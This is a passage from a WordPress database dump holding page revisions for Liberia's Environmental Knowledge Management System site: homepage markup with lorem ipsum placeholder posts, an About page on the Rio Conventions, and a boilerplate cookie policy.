href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->\n	<h4><a href=\"https://ekmsliberia.info/events/\">Events</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/maps/\">Maps</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/terms-of-use/\">Terms of use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/disclaimer/\">Disclaimer</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/cookies-privacy-policy/\">Cookies Privacy Policy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></h4>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 00:08:11','2019-11-09 00:08:11','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(428,1,'2019-11-09 00:10:44','2019-11-09 00:10:44','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->\n	<h4><a href=\"https://ekmsliberia.info/events/\">Events</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/maps/\">Maps</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/terms-of-use/\">Terms of use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/disclaimer/\">Disclaimer</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/cookies-privacy-policy/\">Cookies Privacy Policy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></h4>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 00:10:44','2019-11-09 00:10:44','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(429,1,'2019-11-09 07:42:35','2019-11-09 07:42:35','<h2>About the EKMS</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-09 07:42:35','2019-11-09 07:42:35','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(430,1,'2019-11-09 07:43:24','2019-11-09 07:43:24','<h2>About the EKMS</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-09 07:43:24','2019-11-09 07:43:24','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(431,1,'2019-11-09 07:43:50','2019-11-09 07:43:50','<h2>About the EKMS</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-09 07:43:50','2019-11-09 07:43:50','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(432,1,'2019-11-09 07:48:13','2019-11-09 07:48:13','<h2>About the EKMS</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-09 07:48:13','2019-11-09 07:48:13','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(433,1,'2019-11-09 07:52:43','2019-11-09 07:52:43','<p>Cookie Policy for Environmental Knowledge Management System</p><p>This is the Cookie Policy for Environmental Knowledge Management System, accessible from <a href=\"https://ekmsliberia.info\">https://ekmsliberia.info</a></p><h2><strong>What Are Cookies</strong></h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.</p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.</p><h2><strong>How We Use Cookies</strong></h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.</p><h2><strong>Disabling Cookies</strong></h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.</p><h2><strong>The Cookies We Set</strong></h2><ul><li><p>Account related cookies</p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.</p></li><li><p>Login related cookies</p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.</p></li><li><p>Email newsletters related cookies</p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed/unsubscribed users.</p></li><li><p>Forms related cookies</p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.</p></li><li><p>Site preferences cookies</p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.</p></li></ul><h2><strong>Third Party Cookies</strong></h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.</p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.</p><p>For more information on Google Analytics cookies, see the official Google Analytics page.</p></li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.</p></li><li><p>We also use social media buttons and/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.</p></li></ul><p><strong>More Information</strong></p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site. </p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:</p><ul><li>Email: <a href=\"mailto:contact@ekmsliberia.info\">contact@ekmsliberia.info</a></li></ul>','Cookies Privacy Policy','','inherit','closed','closed','','102-revision-v1','','','2019-11-09 07:52:43','2019-11-09 07:52:43','',102,'https://ekmsliberia.info/102-revision-v1/',0,'revision','',0),(434,1,'2019-11-09 07:53:03','2019-11-09 07:53:03','<p>This is the Cookie Policy for Environmental Knowledge Management System, accessible from <a style=\"font-size: 15px; background-color: #ffffff;\" href=\"https://ekmsliberia.info\">https://ekmsliberia.info</a></p><h2><strong>What Are Cookies</strong></h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.</p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.</p><h2><strong>How We Use Cookies</strong></h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.</p><h2><strong>Disabling Cookies</strong></h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.</p><h2><strong>The Cookies We Set</strong></h2><ul><li><p>Account related cookies</p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.</p></li><li><p>Login related cookies</p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.</p></li><li><p>Email newsletters related cookies</p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed/unsubscribed users.</p></li><li><p>Forms related cookies</p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.</p></li><li><p>Site preferences cookies</p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.</p></li></ul><h2><strong>Third Party Cookies</strong></h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.</p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.</p><p>For more information on Google Analytics cookies, see the official Google Analytics page.</p></li><li><p>From time to time we test new features and 